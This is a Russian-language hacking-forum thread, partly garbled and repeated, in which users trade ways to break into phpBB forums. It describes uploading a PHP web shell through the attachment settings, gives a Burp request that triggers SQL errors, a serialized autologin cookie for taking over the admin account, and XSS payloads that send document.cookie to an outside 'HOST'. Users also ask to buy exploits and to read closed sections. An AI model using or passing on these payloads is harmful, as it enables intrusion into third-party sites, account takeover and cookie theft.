не подкинете ни чего на 3.0.2?

Заливка шелла

phpBB2 Plus by phpMiX

Идем в админпанель+ расширения + управление + добавляем расширение php (группа archives)

Идем на форум.

Создаем тему + прикрепить файл + прикрепляем шел.

После нажатия кнопки "Прикрепить файл" в разделе "Прикрепленные файлы" появится наш шелл. Просто нажимаем на него и он открывается в новой вкладке.

для 3.0.8 есть что-то?

как можно залить шелл,если через шаблоны не получается,выходит sql ошибка

какая именно ?

phpbb 3

Подскажите, пожалуйста, есть ли что на phpbb v3 RC-5 ? Вроде версия выпущена довольно давно, но живого ничего на нее найти не могу

Приложи PoC пожалуйста и уязвимый код.

Народ недопонимает о чём речь.

Пробовал на 3.0.9 - при смене User-Agent - вылетает сессия. И все. Можно код?

[B]phpBB [/COLOR]get_filename($row['lang_iso'],$this->language_directory,$this->language_file,true,true);

$fp= @fopen($phpbb_root_path.$filename,'wb');

if (!$fp)

{

trigger_error(sprintf($user->lang['UNABLE_TO_WRITE_FILE'],$filename) .adm_back_link($this->u_action.'&id='.$lang_id.'&action=details&language_file='.urlencode($selected_lang_file)),E_USER_WARNING);

}

if ($this->language_directory=='email')

{

// Email Template

$entry=$this->prepare_lang_entry($_POST['entry'],false);

fwrite($fp,$entry);

}[/COLOR]
[/PHP]
$entry = $this->prepare_lang_entry($_POST['entry'], false);

fwrite($fp, $entry);

Подтолкните в верном направление

Чувствую себя попугаем. (Птицей, а не форумчанином =) )

(Попугаю кстати отдельный привет =))



Приложите наконец-то уязвимый код и PoC раз постите такие уязвимости.

BigBear ты модератор раздела, ну проверь её сам, что ты просишь код у человека который пишет бред?

Вот запрос о котором он тут пишет:

includes/ucp/ucp_prefs.php

includes/functions.php

тип переменной определяется из $user->data, который выбирается из phpbb_users, а там в свою очередь стоит:

какая на*** скуля, накачали акунетиксов и стали хакерами.

Он просто не правильно выразился (мб просто знаний не хватает в данной области), там не sql inj а просто sql error,так же эррор валится и в topic_st=-1

Но еще раз повторю,не скул это,просто эрроры

Посоветуйте хороший снифер, и ещё вопрос, смогу ли я таким образом угнать админку? Заранее благодарю.

2CoBecTb Fiddler. Нет.

На 3.0.10 есть чего?

Постоянно лезет массовый спам на форум (v. 3.0.11)

То же началось ещё в весрии 3.0.9

Обновил до v. 3.0.11 - всё тоже

Сбэкапил БД уже обновлённого форума, снёс его полностью и поставил всё с самого нуля. Восстановил на полностью новом форуме старую БД. Ничего не дало - спамеры лезут.

Вопрос/ответ - не помагает. ReCaptcha так же...

Что можно сделать. Я не хакер, а просто вебмастер. Кто может помочь?

сделай при регистрации чтобы кроме капчи вопрос был, только вопрос сам придумай чтобы его в базе хрумера не было

Я же писал, что вопрос-ответ уже пробовал. Одинаково спам идёт. Вопросы делал свои и неплохие...

Заказать парсер профилей на заказ, либо при наличии доступа к БД вытягивать нужную колонку из таблицы с пользователями.

Всю спарсенную информацию пропускать через регулярные выражения.

BigBear, Спасибо большое за ответ!

Доступ к форуму только пользовательский, соответственно залезть в БД не могу, поэтому этот вариант не подходит.

А вот на заказ заказать - это выход. Я видел на этом форуме несколько таких предложений, но их авторы не отзываются, а их почты не работают...

Может подскажете к кому обратиться или какую программу использовать для моей цели.

Спасибо.

Попробуйте написать тему здесь. Не забудьте про сумму оплаты.

Ну и если хотите получить свой продукт в целостности и сохранности - советую пользоваться сервисом Гарантов Античата.

Вот ваше спасение: http://www.phpbb.com/customise/db/mod/sortables_captcha_plugin/

Спамеры всё-равно могут пройти, но уже только ручками. Робот такого не умеет. Проверено!

Уважаемые, помогите пожалуйста с эксплуатированием этого эксплойта.

------------------------------------------------------------------

Name : phpBB3 SQL Injection

------------------------------------------------------------------

Date : 27.07.2012

------------------------------------------------------------------

Site : www.phpbb.com

------------------------------------------------------------------

Version : 3.0.10

------------------------------------------------------------------

1) What is it?

This is very nice forum board. You should try it!

------------------------------------------------------------------

2) Type of bug?

SQL Injection (or SQL-info-Leak if You want).

------------------------------------------------------------------

3) Where is the bug?

Vulnerable parameter seems to be 'style' because if we set up this parameter

to 'bigger number' (for example: 111111111) we will get an error, with full SQL

statement.

*updated - dateformat is the second vulnerable parameter!

*updated - post_st is the 3rd vulnerable parameter!

*updated - another one: topic_st

4) PoC traffic from Burp:

4.1) Request :

---

POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174

Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=

Content-Type: application/x-www-form-urlencoded

Content-Length: 258

Connection: close

viewemail=1

&massemail=1

&allowpm=1

&hideonline=0

&notifypm=1

&popuppm=0

&lang=en

&style=%2b1111111111

&tz=0

&dst=0

&dateoptions=D+M+d%2C+Y+g%3Ai+a

&dateformat=D+M+d%2C+Y+g%3Ai+a

&submit=Submit

&creation_time=1343370877

&form_token=576...

---

4.2) Response:

---

HTTP/1.1 503 Service Unavailable

Date: Fri, 27 Jul 2012 06:39:06 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

Content-Length: 2889

Return to the index page

General Error

SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users

SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,

user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,

user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111

WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---

4.2 Other response (this time from post_st parameter):

---





Return to the index page



General Error

SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.

Please contact the

ага, тоже от сплойта выше, как его юзать)

это не експлоит а пример уязвимости, толку от нё кроме вызова ошибки - никакого, заходишь на форум - авторизируешся, заходишь в настройки пррофиля и правишь параметры в заголовках которые указаны в примере

Попробовал проексплуатировать - не получилось. Могу дать ссыль рабочий на сайт с этой "уязвимостью" и учету для тестов.

А вообще ктонить разобрался как её правильно юзать?

Перепробывал все что есть на первой и второй странице топика. Ничего не помогло

Цель - просто прочесть закрытые страницы, темы форума. Имеется форум на phpBB 3.0 Olympus хостинг 2х2

Комьюнити можете пожайлуста помочь, подсказать? А то я в вебе совсем не бум-бум

Full path disclosure:

/privmsg.php?mode=%0A

Poc:

Что с этим делать?

Кто разберется с форумом phpBB?(предположительно 3.1.8)

Нужна помощь с получением доступа

под

3.0.14 phpbb

нет ни у кого уязвимости, могу купить, в лс

thanks

Присоединяюсь. Если что стучите в ЛС. Версия такая же интересует форума

[QUOTE="qBiN"]
↑
Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии
2.0.4
, т.к. версии младше, обсуждать нет смысла.
[B]phpBB [/COLOR]
"
Где

- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "
ping test.com
"),

- папка где находится сам форум (например если у нас
http://123.123.123.123/forum/index.php
, вместо

пишем forum),

- ID пользователя.
Video:
http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где

URL сайта

- директория

- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где

- ip сервера,

- директория в которой находится форум

номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например
http://site.com/phpBB/
, - нужная команда (о командах читаем тут
/threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
[B]phpBB ' onmouseover='alert(document.location="/"+document.cookie)' X=' antichat.ru
[/CODE]
[B]phpbb [/COLOR]
"
Где

- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "
ping test.com
"),

- папка где находится сам форум (например если у нас
http://123.123.123.123/forum/index.php
, вместо

пишем forum),

- ID пользователя.
Video:
http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где

URL сайта

- директория

- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где

- ip сервера,

- директория в которой находится форум

номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например
http://site.com/phpBB/
, - нужная команда (о командах читаем тут
/threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
[B]phpBB ' onmouseover='alert(document.location="/"+document.cookie)' X=' antichat.ru
[/CODE]
[B]phpbb

Добрый какие есть варианты залиться на php 3.0.2.0 (PHP 5.4.45)

шаблоны недоступны (ничего заливать не дает в плане стилей - из бд беруться)

Права администратора

Из модулей:

Пробовал phar но что то не получилось (не особо понял как он работает((

При попытке выполнить: https://www.exploit-db.com/exploits/46512

Ругается на ....[1]

http://dl4.joxi.net/drive/2022/08/06...b752fdc7ca.png

Вот здесь вкратце описывал, что нужно делать. Судя по ошибке на скрине, скрипт эксплоита не может выдрать соль из ответа. Возможно от версии к версии пляшет вёрстка или нейминг, либо WAF блочит запрос. Лучшим вариантом будет установить эту верисю двига локально и воспроизвести все действия вручную и потом отдебажить эксплоит.